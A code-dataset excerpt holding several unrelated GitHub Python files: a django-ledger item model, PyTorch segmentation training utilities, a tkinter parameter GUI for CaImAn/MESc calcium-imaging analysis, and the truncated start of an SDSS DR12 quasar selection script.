round(Decimal.from_float(self.po_quantity * self.po_unit_cost), self.DECIMAL_PLACES)\n\n # ESTIMATE/CONTRACTS...\n def update_cost_estimate(self):\n \"\"\"\n Hook that updates and checks the ItemModel instance cost estimate fields according to its associations.\n Calculates and updates ce_cost_estimate accordingly. Called on every clean() call.\n \"\"\"\n if self.has_estimate():\n if self.ce_quantity is None:\n self.ce_quantity = 0.00\n if self.ce_unit_cost_estimate is None:\n self.ce_unit_cost_estimate = 0.00\n self.ce_cost_estimate = round(Decimal.from_float(self.ce_quantity * self.ce_unit_cost_estimate),\n self.DECIMAL_PLACES)\n\n def update_revenue_estimate(self):\n \"\"\"\n Hook that updates and checks the ItemModel instance revenue estimate fields according to its associations.\n Calculates and updates ce_revenue_estimate accordingly. Called on every clean() call.\n \"\"\"\n if self.has_estimate():\n if self.ce_quantity is None:\n self.ce_quantity = 0.00\n if self.ce_unit_revenue_estimate is None:\n self.ce_unit_revenue_estimate = 0.00\n self.ce_revenue_estimate = Decimal.from_float(self.ce_quantity * self.ce_unit_revenue_estimate)\n\n # HTML TAGS...\n def html_id(self) -> str:\n \"\"\"\n Unique ItemModel instance HTML ID.\n\n Returns\n _______\n str\n HTML ID as a String.\n \"\"\"\n return f'djl-item-{self.uuid}'\n\n def html_id_unit_cost(self) -> str:\n \"\"\"\n Unique ItemModel instance unit cost field HTML ID.\n\n Returns\n _______\n str\n HTML ID as a String.\n \"\"\"\n return f'djl-item-unit-cost-id-{self.uuid}'\n\n def html_id_quantity(self) -> str:\n \"\"\"\n Unique ItemModel instance quantity field HTML ID.\n\n Returns\n _______\n str\n HTML ID as a String.\n \"\"\"\n return f'djl-item-quantity-id-{self.uuid}'\n\n def can_create_bill(self) -> bool:\n \"\"\"\n Determines if the ItemModel instance can be associated with a BillModel.\n Returns\n -------\n bool\n True, if instance can be associated with a BillModel, else False.\n \"\"\"\n return self.bill_model_id is None and self.po_item_status in [\n self.STATUS_ORDERED,\n self.STATUS_IN_TRANSIT,\n self.STATUS_RECEIVED\n ]\n\n def get_status_css_class(self) -> str:\n \"\"\"\n Determines the CSS Class used to represent the ItemModel instance in the UI based on its status.\n\n Returns\n -------\n str\n The CSS class as a String.\n \"\"\"\n if self.is_received():\n return ' is-success'\n elif self.is_canceled():\n return ' is-danger'\n elif self.is_ordered():\n return ' is-info'\n return ' is-warning'\n\n def clean(self):\n if self.has_po() and not self.po_item_status:\n self.po_item_status = self.STATUS_NOT_ORDERED\n\n self.update_po_total_amount()\n self.update_cost_estimate()\n self.update_revenue_estimate()\n self.update_total_amount()\n\n\n# FINAL MODEL CLASSES....\n\nclass UnitOfMeasureModel(UnitOfMeasureModelAbstract):\n \"\"\"\n Base UnitOfMeasureModel from Abstract.\n \"\"\"\n\n\nclass ItemTransactionModel(ItemTransactionModelAbstract):\n \"\"\"\n Base ItemTransactionModel from Abstract.\n \"\"\"\n\n\nclass ItemModel(ItemModelAbstract):\n \"\"\"\n Base ItemModel from Abstract.\n \"\"\"\n","repo_name":"arrobalytics/django-ledger","sub_path":"django_ledger/models/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":53422,"program_lang":"python","lang":"en","doc_type":"code","stars":743,"dataset":"github-code","pt":"40"} +{"seq_id":"41475346219","text":"# -*- coding: utf-8 -*-\n# Time : 2020/7/15 13:32\n# Author : zlich\n# Filename: train_utils.py\nimport torch\nimport torch.nn as nn\nimport os\nimport numpy as np\n# from utils.print_utils import *\nfrom utils.log_utils import infoLogger\nfrom utils.metrics import AverageMeter, Evaluator\nimport time\nimport yaml\nimport os\nfrom .print_utils import print_info_message\n\n\ndef deviceSetting(logger=None, device=None):\n if not device:\n pass\n else:\n os.environ['CUDA_VISIBLE_DEVICES'] = device\n num_gpus = torch.cuda.device_count()\n device = 'cuda' if num_gpus > 0 else 'cpu'\n if num_gpus >= 1:\n if logger:\n logger.info(\"GPU found, device: {}, number: {}.\".format(device, num_gpus))\n else:\n print_info_message(\"GPU found, device: {}, number: {}.\".format(device, num_gpus))\n else:\n if logger:\n logger.warning(\"No GPU found, device: CPU.\")\n else:\n print_info_message(\"No GPU found, device: CPU.\")\n # print_warning_message()\n return num_gpus, torch.device(device)\n\n\ndef savePath(args):\n saveDir = args.logdir\n saveDir = os.path.abspath(saveDir)\n childPath = '{}_{}'.format(args.model, time.strftime(\"%Y%m%d-%H%M%S\"))\n if not args.logdir:\n saveDir = os.path.join('../checkpoints', childPath)\n else:\n saveDir = os.path.join(saveDir, childPath)\n\n os.makedirs(saveDir, exist_ok=True)\n\n return saveDir\n\n\ndef readYAML(path):\n if os.path.isfile(path):\n with open(path, 'r', encoding='utf-8') as fs:\n fs = fs.read()\n config = yaml.load(fs)\n return config\n else:\n return None\n\n\ndef modelDeploy(args, model, optimizer, scheduler, logger):\n if args.num_gpus >= 1:\n from torch.nn.parallel import DataParallel\n model = DataParallel(model)\n model = model.cuda()\n\n if torch.backends.cudnn.is_available():\n import torch.backends.cudnn as cudnn\n cudnn.benchmark = True\n cudnn.deterministic = True\n\n trainData = {'epoch': 0,\n 'loss': [],\n 'miou': [],\n 'val': [],\n 'bestMiou': 0\n }\n\n if args.resume:\n if os.path.isfile(args.resume):\n logger.info(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume, map_location=torch.device('cpu'))\n\n # model&optimizer\n model.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n # stop point\n trainData = checkpoint['trainData']\n for i in range(trainData['epoch']):\n scheduler.step()\n # print(trainData)\n\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, trainData['epoch']))\n\n else:\n logger.error(\"=> no checkpoint found at '{}'\".format(args.resume))\n assert False, \"=> no checkpoint found at '{}'\".format(args.resume)\n\n if args.finetune:\n if os.path.isfile(args.finetune):\n logger.info(\"=> finetuning checkpoint '{}'\".format(args.finetune))\n state_all = torch.load(args.finetune, map_location='cpu')['model']\n state_clip = {} # only use backbone parameters\n # print(model.state_dict().keys())\n for k, v in state_all.items():\n state_clip[k] = v\n # print(state_clip.keys())\n model.load_state_dict(state_clip, strict=False)\n else:\n logger.warning(\"finetune is not a file.\")\n pass\n\n if args.freeze_bn:\n logger.warning('Freezing batch normalization layers')\n for m in model.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n\n return model, trainData\n\n\ndef train_seg(model, dataLoader, epoch, optimizer, loss_fn, num_classes,\n logger, tensorLogger, device='cuda', args=None):\n model.train()\n logger.info(\"Train | [{:2d}/{}] | Lr: {} |\".format(epoch + 1, args.max_epoch, optimizer.param_groups[0][\"lr\"]))\n tensorLogger.add_scalar(\"Common/lr\", optimizer.param_groups[0][\"lr\"], epoch)\n losses = AverageMeter()\n batch_time = AverageMeter()\n Miou = AverageMeter()\n\n evaluator = Evaluator(num_class=num_classes)\n evaluator.reset()\n\n lossList = []\n miouList = []\n for i, (inputs, target) in enumerate(dataLoader):\n inputs = inputs.to(device=device)\n target = target.to(device=device)\n\n initTime = time.time()\n output = model(inputs)\n\n loss = loss_fn(output, target)\n\n output_np = output.detach().cpu().numpy()\n target_np = target.detach().cpu().numpy()\n\n # print(output_np.shape, target_np.shape)\n evaluator.add_batch(target_np, np.argmax(output_np, axis=1))\n losses.update(loss.item(), inputs.size(0))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n batch_time.update(time.time() - initTime)\n if i % 20 == 0:\n miou, iou = evaluator.Mean_Intersection_over_Union()\n Miou.update(miou, 20)\n tensorLogger.add_scalar('train/loss', losses.avg, epoch * len(dataLoader) + i)\n tensorLogger.add_scalar('train/miou', miou, epoch * len(dataLoader) + i)\n lossList.append(losses.avg)\n miouList.append(miou)\n\n if i % 100 == 0: # print after every 100 batches\n logger.info(\"Train | {:2d} | [{:4d}/{}] Infer:{:.2f}sec | Loss:{:.4f} | Miou:{:4f} |\".\n format(epoch + 1, i + 1, len(dataLoader), batch_time.avg, losses.avg, miou))\n evaluator.reset()\n\n return lossList, miouList\n\n\ndef val_seg(model, dataLoader, epoch, loss_fn, num_classes, logger, tensorLogger, device='cuda', args=None):\n model.eval()\n logger.info(\"Valid | [{:2d}/{}]\".format(epoch + 1, args.max_epoch))\n losses = AverageMeter()\n batch_time = AverageMeter()\n\n evaluator = Evaluator(num_class=num_classes)\n evaluator.reset()\n with torch.no_grad():\n for i, (inputs, target) in enumerate(dataLoader):\n inputs = inputs.to(device=device)\n target = target.to(device=device)\n\n initTime = time.time()\n output = model(inputs)\n\n loss = loss_fn(output, target)\n\n output_np = output.detach().cpu().numpy()\n target_np = target.detach().cpu().numpy()\n\n # print(output_np.shape, target_np.shape)\n evaluator.add_batch(target_np, np.argmax(output_np, axis=1))\n losses.update(loss.item(), inputs.size(0))\n\n batch_time.update(time.time() - initTime)\n\n if i % 100 == 0: # print after every 100 batches\n logger.info(\"Valid | {:2d} | [{:4d}/{}] Infer:{:.2f}sec | Loss:{:.4f} | Miou:{:4f} |\".\n format(epoch + 1, i + 1, len(dataLoader), batch_time.avg, losses.avg,\n evaluator.Mean_Intersection_over_Union()[0]))\n Totalmiou = evaluator.Mean_Intersection_over_Union()[0]\n tensorLogger.add_scalar('val/loss', losses.avg, epoch + 1)\n tensorLogger.add_scalar('val/miou', Totalmiou, epoch + 1)\n\n return losses.avg, Totalmiou\n\n\ndef save_checkpoint(state, is_best, dir, extra_info='model', epoch=-1, miou_val=0, logger=None):\n check_pt_file = dir + os.sep + str(extra_info) + '_checkpoint_{}_{:6f}.pth.tar'.format(\n state['trainData']['epoch'] + 1,\n miou_val)\n torch.save(state, check_pt_file)\n if is_best:\n torch.save(state['model'],\n dir + os.sep + str(extra_info) + '_best_{}_{:6f}.pth'.format(state['trainData']['epoch'] + 1,\n miou_val))\n if epoch != -1:\n torch.save(state['model'], dir + os.sep + str(extra_info) + '_ep_' + str(epoch) + '.pth')\n if logger:\n logger.info('Train | {:2d} | Checkpoint: {}'.format(state['trainData']['epoch'] + 1, check_pt_file))\n else:\n print_info_message('Train | {:2d} | Checkpoint: {}'.format(state['trainData']['epoch'] + 1, check_pt_file))\n\n\nif __name__ == '__main__':\n logger = infoLogger(name=\"test\")\n deviceSetting(logger)\n\n config = readYAML(\"../config/bdd100k_deeplabv3p_mobilenetv2_apex.yaml\")\n print(config)\n","repo_name":"hezl1592/PytorchProjectTemplate","sub_path":"utils/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11095715610","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom collections import OrderedDict\r\nfrom tkscrolledframe import ScrolledFrame\r\nimport json\r\nimport re\r\nimport os.path\r\n\r\nclass GUI():\r\n\r\n # Define settings upon initialization. Here you can specify\r\n def __init__(self, master=None, nogui=False):\r\n self.params = {\r\n \"files\": {\r\n \"name\": \"MESc input files\",\r\n \"type\": \"filelist\",\r\n \"default_value\": [],\r\n \"description\": \"\",\r\n },\r\n \"decay_time\": {\r\n \"name\": \"Decay Time\",\r\n \"type\": float,\r\n \"default_value\": 0.4,\r\n \"description\": \"Length of a typical transient in seconds. decay_time is an approximation of the time scale over which to expect a significant shift in the calcium signal during a transient. It defaults to 0.4, which is appropriate for fast indicators (GCaMP6f), slow indicators might use 1 or even more. However, decay_time does not have to precisely fit the data, approximations are enough.\",\r\n },\r\n \"gSig\": {\r\n \"name\": \"Half-Size of Neurons\",\r\n \"type\": \"pair\",\r\n \"default_value\": [6, 6],\r\n \"description\": \"Expected half-size of neurons in pixels [rows X columns]. CRUCIAL parameter for proper component detection.\",\r\n },\r\n \"p\": {\r\n \"name\": \"Order of AR Indicator Dynamics\",\r\n \"type\": int,\r\n \"default_value\": 2,\r\n \"description\": \"Order of the autoregressive model. p = 0 turns deconvolution off. If transients in your data rise instantaneously, set p = 1 (occurs at low sample rate or slow indicator). If transients have visible rise time, set p = 2. If the wrong order is chosen, spikes are extracted unreliably.\",\r\n },\r\n \"ds_factor\": {\r\n \"name\": \"Spatial Downsampling Factor\",\r\n \"type\": int,\r\n \"default_value\": 1,\r\n \"description\": \"Spatial downsampling factor (increases speed but may lose some fine structure).\",\r\n },\r\n \"gnb\": {\r\n \"name\": \"Number of Background Components\",\r\n \"type\": int,\r\n \"default_value\": 2,\r\n \"description\": \"Number of global background components. This is a measure of the complexity of your background noise. Defaults to nb = 2, assuming a relatively homogeneous background. nb = 3 might fit for more complex noise, nb = 1 is usually too low. If nb is set too low, extracted traces appear too noisy, if nb is set too high, neuronal signal starts getting absorbed into the background reduction, resulting in reduced transients.\",\r\n },\r\n \"online_MC\": {\r\n \"name\": \"Enable Online Motion Correction\",\r\n \"type\": bool,\r\n \"default_value\": True,\r\n \"description\": \"Flag for online motion correction.\",\r\n },\r\n \"pw_rigid\": {\r\n \"name\": \"Enable PW-Rigid Motion Correction\",\r\n \"type\": bool,\r\n \"default_value\": False,\r\n \"description\": \"Flag for pw-rigid motion correction (slower but potentially more accurate).\",\r\n },\r\n \"max_shifts_online\": {\r\n \"name\": \"Maximum Shift\",\r\n \"type\": int,\r\n \"default_value\": 60,\r\n \"description\": \"Maximum shifts for motion correction during online processing.\",\r\n },\r\n \"thresh_CNN_noisy\": {\r\n \"name\": \"Online CNN Threshold\",\r\n \"type\": float,\r\n \"default_value\": 0.7,\r\n \"description\": \"Threshold for the online CNN classifier. Greater thresholds find better components but may not find as many components. Set to 0.5 for higher recall values, but at the expense of lower precision. Set to 0.7 for higher precision values, but at the expense of lower recall.\",\r\n },\r\n \"min_SNR\": {\r\n \"name\": \"Min Signal-Noise-Ratio (SNR)\",\r\n \"type\": float,\r\n \"default_value\": 1.5,\r\n \"description\": \"Minimum SNR Threshold for detecting new components. Peak SNR is calculated from strong calcium transients and the noise estimate. Set to 1.0 for higher recall values, but at the expense of lower precision. Set to 1.5 for higher precision values, but at the expense of lower recall.\",\r\n },\r\n \"min_num_trial\": {\r\n \"name\": \"Min Number of Candidates\",\r\n \"type\": int,\r\n \"default_value\": 5,\r\n \"description\": \"Number of candidate components to be considered at each timestep. Set to 10 for higher recall values, but at the expense of lower precision. Set to 5 for higher precision values, but at the expense of lower recall.\",\r\n },\r\n \"epochs\": {\r\n \"name\": \"Epochs\",\r\n \"type\": int,\r\n \"default_value\": 1,\r\n \"description\": \"Number of passes over the data. This increases the time per MUnit but is beneficial for finding more components, especially in the strict regime or high acceptance thresholds.\",\r\n },\r\n \"rval_thr\": {\r\n \"name\": \"Spatial Footprint Consistency\",\r\n \"type\": float,\r\n \"default_value\": 0.8,\r\n \"description\": \"The spatial footprint of the component is compared with the frames where this component is active. Other component’s signals are subtracted from these frames, and the resulting raw data is correlated against the spatial component. This ensures that the raw data at the spatial footprint aligns with the extracted trace.\",\r\n },\r\n \"init_batch\": {\r\n \"name\": \"Frames for Initialization\",\r\n \"type\": int,\r\n \"default_value\": 100,\r\n \"description\": \"Number of frames for initialization.\",\r\n },\r\n \"K\": {\r\n \"name\": \"Initial Number of Components\",\r\n \"type\": int,\r\n \"default_value\": 5,\r\n \"description\": \"Initial number of components.\",\r\n },\r\n \"layer_names\": {\r\n \"name\": \"Which layers to process\",\r\n \"type\": str,\r\n \"default_value\": \"*\",\r\n \"description\": \"Which layers to process from MESc files. If set to a comma-separated list of (one-based) layer indices, then only those layers will be processed. If set to the special value '*', every layer is processed.\",\r\n },\r\n \"compute_mean_images\": {\r\n \"name\": \"Save mean images\",\r\n \"type\": bool,\r\n \"default_value\": False,\r\n \"description\": \"If set, then the CaImAn-MESc module will compute the average of all frames for each layer before processing that layer and save them in the output folder.\",\r\n },\r\n \"show_plots\": {\r\n \"name\": \"Show CaImAn-MESc plots\",\r\n \"type\": bool,\r\n \"default_value\": True,\r\n \"description\": \"If set, then the CaImAn MESc module will visualize the partial results during the OnACID. Currently, two plots are shown: a plot with the ROI contours overlaid on the current frame, and a plot showing the activity of each component.\",\r\n },\r\n \"contour_plot_scale\": {\r\n \"name\": \"Contour plot rescale factor\",\r\n \"type\": float,\r\n \"default_value\": 1.0,\r\n \"description\": \"The contour plot window is rescaled by this factor.\",\r\n },\r\n \"export_centers\": {\r\n \"name\": \"Put ROI centers on clipboard\",\r\n \"type\": bool,\r\n \"default_value\": True,\r\n \"description\": \"If set, then the CaImAn MESc module will put the current ROI centers on the clipboard every 100 frames during OnACID. The format is consistent with the one used by MESc.\",\r\n },\r\n \"save_results\": {\r\n \"name\": \"Save OnACID results\",\r\n \"type\": bool,\r\n \"default_value\": False,\r\n \"description\": \"If set, then the OnACID results will be dumped as a separate .hdf5 file for each layer. The HDF5 structure is CaImAn's own, and is based on the fields of the OnACID Python object.\",\r\n },\r\n \"save_mescroi\": {\r\n \"name\": \"Save contours as .mescroi\",\r\n \"type\": bool,\r\n \"default_value\": False,\r\n \"description\": \"If set, then the contours of the ROIs will be saved as a separate .mescroi file for each layer so they can be imported into the MESc GUI.\",\r\n },\r\n \"length_override\": {\r\n \"name\": \"Max number of real-time frames\",\r\n \"type\": int,\r\n \"default_value\": 1000,\r\n \"description\": \"CaImAn needs the total number of frames in advance to preallocate its arrays. When processing real-time data, this is not available, so we pass an upper estimate to CaImAn, and after the run, we truncate the arrays to the actual movie length. Has no effect when not running in real time.\",\r\n },\r\n \"real_time_save_dir\": {\r\n \"name\": \"Results folder for real-time data\",\r\n \"type\": \"dir\",\r\n \"default_value\": \"\",\r\n \"description\": \"When working from a file, all results are saved into the same directory as the input. When using real-time data, the the \\\"input file\\\" is just a quasi-path provided by the MESc GUI, so results will be saved into this directory instead. Has no effect when not running in real time.\",\r\n },\r\n \"activity_plot_rows\": {\r\n \"name\": \"Activity plot rows\",\r\n \"type\": int,\r\n \"default_value\": 5,\r\n \"description\": \"Number of rows for the CaImAn-MESc activity plot.\",\r\n },\r\n \"activity_plot_cols\": {\r\n \"name\": \"Activity plot columns\",\r\n \"type\": int,\r\n \"default_value\": 8,\r\n \"description\": \"Number of columns for the CaImAn-MESc activity plot.\",\r\n },\r\n \r\n # NOTE: these are commented out because they don't correspond to any CaImAn parameter\r\n #\"component_area_thr\": {\r\n #\"name\": \"Component Area Threshold\",\r\n #\"type\": int,\r\n #\"default_value\": 100,\r\n #\"description\": \"Sets the minimum area threshold (in pixels) in which components (ROIS) much be larger than to be accepted.\",\r\n #},\r\n #\"generate_dff\": {\r\n #\"name\": \"Generate DFF traces\",\r\n #\"type\": bool,\r\n #\"default_value\": True,\r\n #\"description\": \"\",\r\n #},\r\n }\r\n \r\n self.sections = [\r\n {\r\n \"label\": \"Please select MESc file(s):\",\r\n \"params\": [\"files\"],\r\n },\r\n {\r\n \"label\": \"DATA PARAMETERS\",\r\n \"params\": [\"decay_time\", \"gSig\", \"p\", \"ds_factor\", \"gnb\"],\r\n },\r\n {\r\n \"label\": \"MOTION CORRECTION\",\r\n \"params\": [\"online_MC\", \"pw_rigid\", \"max_shifts_online\"],\r\n },\r\n {\r\n \"label\": \"ALGORITHM PARAMETERS\",\r\n \"params\": [\"thresh_CNN_noisy\", \"min_SNR\", \"min_num_trial\", \"epochs\", \"rval_thr\", \"init_batch\", \"K\"],\r\n },\r\n {\r\n \"label\": \"MESC-SPECIFIC PARAMETERS\",\r\n \"params\": [\"layer_names\", \"compute_mean_images\", \"show_plots\", \"contour_plot_scale\", \"export_centers\", \"save_results\", \"save_mescroi\", \"length_override\", \"real_time_save_dir\", \"activity_plot_rows\", \"activity_plot_cols\"],\r\n },\r\n \r\n # NOTE: these are commented out because they don't correspond to any CaImAn parameter\r\n #{\r\n #\"label\": \"EVALUATION PARAMETERS\",\r\n #\"params\": [\"component_area_thr\", \"generate_dff\"],\r\n #},\r\n ]\r\n \r\n # a small self-check to ensure that params added in the future are also added to a section\r\n for param in self.params:\r\n found = False\r\n for section in self.sections:\r\n if param in section[\"params\"]:\r\n found = True\r\n \r\n if not found:\r\n raise RuntimeError(\"The MESc GUI param '\" + param + \"' was specified but not added to any of the sections!\")\r\n \r\n self.values = {}\r\n for param in self.params:\r\n self.values[param] = self.params[param][\"default_value\"]\r\n \r\n self.load_params()\r\n \r\n # we have the param values set up from the json and/or the defaults; if the program was started with the \"nogui\" option, then we are done\r\n if nogui:\r\n return\r\n\r\n self.init_window()\r\n self.build_gui()\r\n self.set_field_values()\r\n\r\n # bring window to the front\r\n self.root.lift()\r\n self.root.attributes('-topmost', True)\r\n self.root.after_idle(self.root.attributes, '-topmost', False)\r\n\r\n self.root.mainloop()\r\n \r\n # Creation of init_window\r\n def init_window(self):\r\n self.root = Tk()\r\n self.root.title(\"MESc OnACID\")\r\n self.root.geometry(\"650x950\")\r\n\r\n # Create a ScrolledFrame widget\r\n sf = ScrolledFrame(self.root)\r\n sf.pack(side=\"top\", expand=1, fill=\"both\")\r\n\r\n # Bind the arrow keys and scroll wheel\r\n sf.bind_arrow_keys(self.root)\r\n sf.bind_scroll_wheel(self.root)\r\n\r\n # Create a frame within the ScrolledFrame\r\n self.inner_frame = sf.display_widget(Frame)\r\n\r\n def build_gui(self):\r\n self.gui_elements = []\r\n self.input_variables = {}\r\n \r\n current_row = 0\r\n for section in self.sections:\r\n label = Label(self.inner_frame, text = section[\"label\"], font = 'BOLD')\r\n label.grid(column = 0, row = current_row)\r\n self.gui_elements.append(label)\r\n \r\n current_row += 1\r\n \r\n for param in section[\"params\"]:\r\n if self.params[param][\"type\"] == \"filelist\":\r\n self.input_variables[param] = []\r\n \r\n file_count = len(self.values[param])\r\n for index in range(0, file_count):\r\n input_variable = StringVar()\r\n self.input_variables[param].append(input_variable)\r\n \r\n input_field = Entry(self.inner_frame, width = 50, textvariable = input_variable)\r\n input_field.grid(column = 1, row = current_row, columnspan = 2)\r\n self.gui_elements.append(input_field)\r\n \r\n browse_button = Button(self.inner_frame, text = \"...\", command = lambda param=param, index=index: self.open_file_browser(param, index))\r\n browse_button.grid(column = 3, row = current_row)\r\n self.gui_elements.append(browse_button)\r\n \r\n current_row += 1\r\n \r\n add_file_button = Button(self.inner_frame, text = \"+\", command = lambda param=param: self.add_file_input(param))\r\n add_file_button.grid(column = 2, row = current_row, sticky = E)\r\n self.gui_elements.append(add_file_button)\r\n \r\n remove_file_button = Button(self.inner_frame, text = \"-\", command = lambda param=param: self.remove_file_input(param))\r\n remove_file_button.grid(column = 3, row = current_row, sticky = W)\r\n self.gui_elements.append(remove_file_button)\r\n \r\n current_row += 1\r\n elif self.params[param][\"type\"] == \"dir\":\r\n label = Label(self.inner_frame, text = (self.params[param][\"name\"] + \": \"))\r\n label.grid(column = 1, row = current_row, sticky = E)\r\n self.gui_elements.append(label)\r\n \r\n input_variable = StringVar()\r\n self.input_variables[param] = input_variable\r\n \r\n input_field = Entry(self.inner_frame, width = 20, textvariable = input_variable)\r\n input_field.grid(column = 2, row = current_row, sticky = W)\r\n self.gui_elements.append(input_field)\r\n \r\n browse_button = Button(self.inner_frame, text = \"...\", command = lambda param=param: self.open_directory_chooser(param))\r\n browse_button.grid(column = 3, row = current_row)\r\n self.gui_elements.append(browse_button)\r\n \r\n current_row += 1\r\n else:\r\n label = Label(self.inner_frame, text = (self.params[param][\"name\"] + \": \"))\r\n label.grid(column = 1, row = current_row, sticky = E)\r\n self.gui_elements.append(label)\r\n \r\n if self.params[param][\"type\"] == int:\r\n input_variable = IntVar()\r\n input_field = Entry(self.inner_frame, width = 5, textvariable = input_variable)\r\n elif self.params[param][\"type\"] == float:\r\n input_variable = DoubleVar()\r\n input_field = Entry(self.inner_frame, width = 5, textvariable = input_variable)\r\n elif self.params[param][\"type\"] == bool:\r\n input_variable = BooleanVar()\r\n input_field = Checkbutton(self.inner_frame, variable = input_variable)\r\n elif self.params[param][\"type\"] == str:\r\n input_variable = StringVar()\r\n input_field = Entry(self.inner_frame, width = 5, textvariable = input_variable)\r\n elif self.params[param][\"type\"] == \"pair\":\r\n input_variable = StringVar()\r\n input_field = Entry(self.inner_frame, width = 5, textvariable = input_variable)\r\n else:\r\n raise RuntimeError(\"Unknown param type\")\r\n \r\n self.input_variables[param] = input_variable\r\n input_field.grid(column = 2, row = current_row, sticky = W)\r\n self.gui_elements.append(input_field)\r\n \r\n info_button = Button(self.inner_frame, text = \"?\", command = lambda param=param: self.show_param_description(param))\r\n info_button.grid(column = 3, row = current_row)\r\n self.gui_elements.append(info_button)\r\n \r\n current_row += 1\r\n \r\n run_button = Button(self.inner_frame, text=\"RUN PROGRAM\", font=(\"Helvetica\", 12), command = self.run_program, height = 2, width = 15, bg = \"gray64\")\r\n run_button.grid(column = 2, row = current_row, sticky = W)\r\n self.gui_elements.append(run_button)\r\n \r\n current_row += 1\r\n \r\n def clear_gui(self):\r\n for gui_element in self.gui_elements:\r\n gui_element.destroy()\r\n \r\n self.gui_elements = []\r\n self.input_variables = []\r\n \r\n def get_field_values(self):\r\n for param in self.params:\r\n param_value = None\r\n \r\n if self.params[param][\"type\"] == \"filelist\":\r\n param_value = []\r\n for input_variable in self.input_variables[param]:\r\n param_value.append(input_variable.get())\r\n else:\r\n input_field_value = self.input_variables[param].get()\r\n \r\n if self.params[param][\"type\"] == int:\r\n param_value = input_field_value\r\n elif self.params[param][\"type\"] == float:\r\n param_value = input_field_value\r\n elif self.params[param][\"type\"] == bool:\r\n param_value = input_field_value\r\n elif self.params[param][\"type\"] == str:\r\n param_value = input_field_value\r\n elif self.params[param][\"type\"] == \"pair\":\r\n result = re.match(\"\\\\[(\\\\d+)\\\\s*,\\\\s*(\\\\d+)\\\\]\", input_field_value)\r\n if result:\r\n param_value = [int(result.group(1)), int(result.group(2))]\r\n else:\r\n raise RuntimeError(\"Invalid value entered for param \" + param)\r\n elif self.params[param][\"type\"] == \"dir\":\r\n param_value = input_field_value\r\n else:\r\n raise RuntimeError(\"Unknown parameter type\")\r\n \r\n self.values[param] = param_value\r\n \r\n def set_field_values(self):\r\n for param in self.params:\r\n param_value = self.values[param]\r\n \r\n if self.params[param][\"type\"] == \"filelist\":\r\n for index, input_variable in enumerate(self.input_variables[param]):\r\n input_variable.set(param_value[index])\r\n else:\r\n input_variable = self.input_variables[param]\r\n \r\n if self.params[param][\"type\"] == int:\r\n input_variable.set(param_value)\r\n elif self.params[param][\"type\"] == float:\r\n input_variable.set(param_value)\r\n elif self.params[param][\"type\"] == bool:\r\n input_variable.set(param_value)\r\n elif self.params[param][\"type\"] == str:\r\n input_variable.set(param_value)\r\n elif self.params[param][\"type\"] == \"pair\":\r\n input_variable.set(\"[%d, %d]\" % (param_value[0], param_value[1]))\r\n elif self.params[param][\"type\"] == \"dir\":\r\n input_variable.set(param_value)\r\n else:\r\n raise RuntimeError(\"Unknown param type\")\r\n \r\n def open_file_browser(self, param, index):\r\n current_file = self.input_variables[param][index].get()\r\n current_dir = os.path.dirname(current_file)\r\n new_file = filedialog.askopenfilename(initialdir = current_dir, title = \"Select file\", filetypes = ((\"MESc files\", \"*.mesc\"), (\"all files\", \"*.*\")))\r\n if new_file:\r\n self.input_variables[param][index].set(new_file)\r\n \r\n def open_directory_chooser(self, param):\r\n current_dir = self.input_variables[param].get()\r\n new_dir = filedialog.askdirectory(initialdir = current_dir, title = \"Select directory\")\r\n if new_dir:\r\n self.input_variables[param].set(new_dir)\r\n \r\n def add_file_input(self, param):\r\n self.get_field_values()\r\n self.clear_gui()\r\n \r\n self.values[param].append(\"\")\r\n \r\n self.build_gui()\r\n self.set_field_values()\r\n \r\n def remove_file_input(self, param):\r\n self.get_field_values()\r\n self.clear_gui()\r\n \r\n self.values[param].pop()\r\n \r\n self.build_gui()\r\n self.set_field_values()\r\n\r\n def run_program(self):\r\n self.get_field_values()\r\n self.save_params()\r\n \r\n # we destroy everything and terminate the main loop\r\n self.root.destroy()\r\n self.root.quit()\r\n\r\n def show_param_description(self, param):\r\n description_window = Toplevel()\r\n description_window.geometry('400x200')\r\n description_window.attributes('-topmost', 'true')\r\n \r\n display = Label(description_window, text = self.params[param][\"description\"], wraplength = 380, anchor = 'w', font = 'TkDefaultFont 11')\r\n display.pack()\r\n \r\n def load_params(self):\r\n json_data = {}\r\n try:\r\n with open(\"mesc_params.json\", \"r\") as f:\r\n json_data = json.load(f)\r\n except Exception as e:\r\n print(\"Warning: no mesc_params.json was found, falling back to default parameter values\")\r\n \r\n # we iterate over the params we know about, and only use the values for valid params\r\n for param in self.params:\r\n if param in json_data:\r\n self.values[param] = json_data[param]\r\n \r\n def save_params(self):\r\n try:\r\n with open(\"mesc_params.json\", \"w\") as f:\r\n json.dump(self.values, f, indent = 4)\r\n except Exception as e:\r\n print(\"Warning: failed to write parameter values to mesc_params.json\")\r\n","repo_name":"Kata5/FemtoOnAcid","sub_path":"Onacid for Femtonics Microscopes/caiman_mesc/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":25132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26539059496","text":"# Data preparation, SGC+NGC\n\nimport pandas as pd\nfrom astropy.io import fits\nimport numpy as np\n\nDR12 = fits.open('../DR12Q.fits')\n\nq_dr12 = DR12[1].data[(DR12[1].data['PSFMAG'][:,1]<=22)& (DR12[1].data['PSFMAG'][:,1]>=5.)\n &(DR12[1].data['MI']<-23.78)&(DR12[1].data['MI']>=-28.74)\n &(DR12[1].data['Z_VI']<=3.4)&(DR12[1].data['Z_VI']>=2.2)\n &(DR12[1].data['FIRST_MATCHED']==0)\n &(DR12[1].data['BOSS_TARGET1']!=0)]\nq_dr12 = 